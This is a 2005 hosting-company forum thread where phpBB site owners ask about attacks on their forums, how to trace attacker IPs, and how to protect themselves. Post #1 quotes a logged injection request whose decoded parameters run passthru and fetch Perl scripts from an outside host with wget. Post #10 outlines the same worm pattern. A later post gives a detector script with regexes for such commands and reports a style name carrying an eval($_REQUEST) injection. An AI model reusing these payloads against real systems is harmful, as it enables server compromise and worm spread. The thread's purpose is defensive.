catalyst2 community forums  
28-02-2005, 09:02 PM   #1
Registered User
Join Date: Feb 2004
Location: Essex, UK
Posts: 88
phpBB forum attacks

The phpBB team are having minor issues at the moment plugging the security exploits in their software. As forums become more common, they're the next favourite target for hackers and 'meddlers'.

Looking through my weblogs, I've noticed they're growing and one today even used one of the newest exploits.

My query is, I've obviously got the IP address of the person that tried to break into my site. I can email their ISP and let them know one of their users is 'doing naughty things, and can you rap their knuckles please' but does it actually do any good? Do ISPs actually do anything?

If so, my second query, is are there any good sites or tools to trace IP addresses? Eg, 65.75.138.50. Using http://www.arin.net/whois/ only gave me "S. Carrabis NET-MANAGED" ???? Not really much to find an ISP, or confirm who it belongs to.

Apart from keeping the phpBB forums up-to-date (obviously), is there anything I can do to more actively protect my site? I know I can ban IP addresses and ranges, but I'm bound to block either not enough or too much.

How do other people react to 'attacks'?

Example from my log of an attack:
Code:
65.75.138.50 - - [28/Feb/2005:19:56:33 +0000] "GET /forum/viewtopic.php?t=59&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 29465 "-" "LWP::Simple/5.803"
Chris Locke
28-02-2005, 09:15 PM   #2
Bring me your problems :p
Join Date: Jan 2003
Location: /dev/ahhhhhhhhh
Posts: 3,537
Hi,

I'm not sure which vuln this is, but many are just infected machines and not actual people. You could try emailing the host, always worth a try.
paulredpath
28-02-2005, 09:30 PM   #3
Registered User
Join Date: Feb 2004
Location: Essex, UK
Posts: 88
As usual, cheers for the prompt reply!

Armed with just an IP, which is the best method of tracking down the host? Just a simple DIG or is that the same as a whoIs lookup?
As detailed above, what happens if the information from whoIs is just 'pants'? (or more simply, that I can't read it properly...)
Chris Locke
28-02-2005, 09:33 PM   #4
Bring me your problems :p
Join Date: Jan 2003
Location: /dev/ahhhhhhhhh
Posts: 3,537
Do a whois on www.ripe.net or www.arin.net; these will tell you who owns the IPs.
paulredpath
28-02-2005, 09:38 PM   #5
Administrator
Join Date: May 2003
Posts: 1,299
Not very scientific, but typing the IP into Google with speech marks around it may help you out....
Jacob
28-02-2005, 09:46 PM   #6
Registered User
Join Date: Feb 2004
Location: Essex, UK
Posts: 88
Ok. Thanks.
Will look into it more.
Chris Locke
01-03-2005, 12:23 AM   #7
Registered User
Join Date: Jul 2003
Location: West Midlands
Posts: 188
Can you explain how that example from your log is interpreted as an attack?
__________________
cat4um AT aer-net.co.uk - Cat2 Helpdesk
Waldovia PM
01-03-2005, 12:37 AM   #8
Bring me your problems :p
Join Date: Jan 2003
Location: /dev/ahhhhhhhhh
Posts: 3,537
If you look closely you can see it has *nix commands embedded in it.
paulredpath
01-03-2005, 09:32 AM   #9
Registered User
Join Date: Feb 2004
Location: Essex, UK
Posts: 88
Quote:
Originally Posted by Waldovia PM
Can you explain how that example from your log is interpreted as an attack?
viewtopic.php (used in phpBB forums mainly) has a couple of security exploits where you can 'break it' and run perl scripts - eg, this code:
Code:
cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;
www.panahi.com isn't my site, so no request to my site should reference it. In fact, that URL points to some code which I haven't a clue what it does - but I suspect it does some naughties to the Banana server if my forum wasn't patched and it got executed.
There are a couple of other entries like that where they run other perl commands - normally printq commands, which I assume are just 'tests'.
Chris Locke
06-03-2005, 04:10 PM   #10
rob
Resident NetOp/*nix Geek
Join Date: Dec 2003
Posts: 223
Actually, you might remember around Christmas we had a large number of suspended sites on banana, that was because of a bug related to this. The general pattern of all of the exploits was something like this (embedded in the insecure viewtopic.php page):


cd /tmp
wget <random URL>/script
perl /tmp/script

That then ran a perl worm that just looked around and exploited as many forums as it could, by googling for something like inurl:viewtopic.php.

The upgraded version is harmless, but it's a pretty fundamental injection idea that really should have been caught. Open Source is great, but sometimes the speed of development means that there's insecure code written, which isn't good.

Maybe we should have security audit days on major projects where all development is stopped and the bugs and security holes are located.

Rob
__________________
Rob Shakir - rob@catalyst2.com
rob
29-03-2005, 10:47 PM   #11
Registered User
Join Date: Feb 2004
Posts: 36
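A defender-side check for the pattern described in post #1 and post #10, added here as an example and not code from anyone in this thread: it parses Apache combined-format log lines, percent-decodes each viewtopic.php query parameter twice (the request double-encodes the quote as %2527 so that one decode still leaves a quote), and flags requests whose parameters carry a PHP function call inside a quoted string or a wget/perl command chain. The sample input is the log line quoted in post #1 plus a constructed benign request; the marker regexes are my own assumptions, not a phpBB-supplied signature.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache combined log: IP, ident, user, [timestamp], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A PHP call following a quote that closes the string highlight= is interpolated into (assumed marker list)
PHP_RE = re.compile(r"'.*\b(?:passthru|system|exec|shell_exec|eval)\s*\(")
# A shell command chain, normally placed in a second parameter that the injected PHP call reads
SHELL_RE = re.compile(r"(?:^|[;|&\s])(?:wget|curl|perl|cd|rm|chmod)\s")

def decode_query(url):
    """Map each query parameter to its value decoded twice (%2527 -> %27 -> ')."""
    params = {}
    for pair in urlsplit(url).query.split("&"):     # split on & only: ';' is part of the payload
        name, _, value = pair.partition("=")
        params[unquote(name)] = unquote(unquote(value))
    return params

def classify(line):
    """Return {"ip", "ua", "reasons"} for a viewtopic.php request carrying injected code, else None."""
    m = LOG_RE.match(line)
    if not m or "viewtopic.php" not in m.group("url"):
        return None
    reasons = []
    for name, value in decode_query(m.group("url")).items():
        low = value.lower()
        if PHP_RE.search(low):
            reasons.append(f"PHP call injected via parameter {name!r}")
        if SHELL_RE.search(low):
            reasons.append(f"shell command chain in parameter {name!r}")
    return {"ip": m.group("ip"), "ua": m.group("ua"), "reasons": reasons} if reasons else None

def scan(lines):
    """Run classify() over an iterable of log lines and return only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Sample input: the log line from post #1 above, followed by a constructed benign search request.
SAMPLE_LINES = [
    '''65.75.138.50 - - [28/Feb/2005:19:56:33 +0000] "GET /forum/viewtopic.php?t=59&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 29465 "-" "LWP::Simple/5.803"''',
    '''192.0.2.10 - - [28/Feb/2005:20:01:07 +0000] "GET /forum/viewtopic.php?t=59&highlight=upgrade HTTP/1.1" 200 29465 "http://example.invalid/forum/" "Mozilla/5.0 (constructed)"''',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit["ip"], hit["ua"], "; ".join(hit["reasons"]))
```

The status code is deliberately ignored: the quoted request returned 200, so a patched forum and an exploited one look the same in the access log, and only the decoded parameters tell them apart.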
My customised default template on my install of phpBB has been removed and replaced by a style FI Black, though it has the name

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

when looking at the Styles Administration.

Is this some kind of hack/exploit attempt?
liamail
29-03-2005, 11:55 PM   #12
Bring me your problems :p
Join Date: Jan 2003
Location: /dev/ahhhhhhhhh
Posts: 3,537
Looks like it. What version were you running?
paulredpath
30-03-2005, 12:08 AM   #13
Registered User
Join Date: Feb 2004
Posts: 36
It was version 2.0.11; since posting I have upgraded to 2.0.13.

I deleted the hacked style and re-installed mine. Nothing seems to be amiss now. Do I need to do anything else? Was the hack malicious? Is whatever it does intended to cause harm / damage? Do I need to inform the users of my board?

I did look for the upgrade in CPanel when it was announced by the phpBB team but it wasn't available then, and I subsequently forgot about it.

Would it be possible to have a thread in the Announcements forum (or another if more appropriate) that can be updated / replied to when a new version of phpBB is available to upgrade through CPanel? I would have thought that there must be enough phpBB installs and hence demand among catalyst2 users that people would subscribe to such a thread for instant notification of available upgrades.

Last edited by liamail; 30-03-2005 at 12:11 AM.
liamail
30-03-2005, 05:59 AM   #14
Registered User
Join Date: Feb 2004
Location: Essex, UK
Posts: 88
Although nice to do it through cPanel, the upgrades available from phpBB are really easy to do. The last couple of updates were simply replacement files, so a quick upload via FTP was all that was needed.

Sometimes quicker to do it when notified, rather than wait for cPanel to be updated...
Chris Locke